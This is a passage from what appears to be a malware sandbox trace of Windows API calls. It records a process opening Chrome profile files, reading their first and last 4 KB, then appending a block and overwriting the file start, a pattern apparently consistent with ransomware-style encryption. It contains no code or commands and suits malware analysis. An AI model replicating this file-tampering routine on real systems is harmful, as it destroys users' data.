hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.062] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x794cf [0171.062] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.062] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.062] ReleaseMutex (hMutex=0x168) returned 1 [0171.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mirroring_hangouts.js", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0171.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mirroring_hangouts.js", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mirroring_hangouts.js", lpUsedDefaultChar=0x0) returned 21 [0171.062] ReadFile (in: hFile=0x20c, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0171.065] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x784cf [0171.065] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.067] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x784cf [0171.068] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0171.068] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0171.068] WriteFile (in: hFile=0x20c, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0171.068] CloseHandle (hObject=0x20c) returned 1 [0171.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.070] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.070] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3f79 [0171.070] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.070] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.070] ReleaseMutex (hMutex=0x168) returned 1 [0171.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.071] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.075] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2f79 [0171.075] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.076] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2f79 [0171.077] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0171.078] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0171.078] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0171.078] CloseHandle (hObject=0x20c) returned 1 [0171.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.079] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.079] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4082 [0171.080] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.080] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.080] ReleaseMutex (hMutex=0x168) returned 1 [0171.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.080] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.082] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3082 [0171.082] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.083] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3082 [0171.083] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0171.083] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0171.083] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0171.084] CloseHandle (hObject=0x20c) returned 1 [0171.084] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.085] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.085] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5074 [0171.085] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.085] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.085] ReleaseMutex (hMutex=0x168) returned 1 [0171.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.086] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.087] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4074 [0171.088] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.089] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4074 [0171.089] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0171.089] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0171.089] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0171.089] CloseHandle (hObject=0x20c) returned 1 [0171.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.091] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.091] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3f8b [0171.091] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.091] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.091] ReleaseMutex (hMutex=0x168) returned 1 [0171.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.091] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.093] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2f8b [0171.093] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.094] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2f8b [0171.094] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0171.095] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0171.095] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0171.095] CloseHandle (hObject=0x20c) returned 1 [0171.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.097] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.097] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x490e [0171.097] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.097] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.097] ReleaseMutex (hMutex=0x168) returned 1 [0171.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.097] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.099] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x390e [0171.099] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.515] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x390e [0171.516] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0171.516] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0171.516] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0171.516] CloseHandle (hObject=0x20c) returned 1 [0171.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0171.940] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.940] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4f64 [0171.940] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0171.940] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.940] ReleaseMutex (hMutex=0x168) returned 1 [0171.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0171.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0171.940] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.957] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3f64 [0171.957] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0171.959] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3f64 [0171.959] WriteFile (in: hFile=0x1fc, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.167] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0174.167] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.167] CloseHandle (hObject=0x1fc) returned 1 [0174.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Favicons" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\favicons"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0174.168] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.168] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5000 [0174.169] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.169] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.169] ReleaseMutex (hMutex=0x168) returned 1 [0174.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Favicons", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0174.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 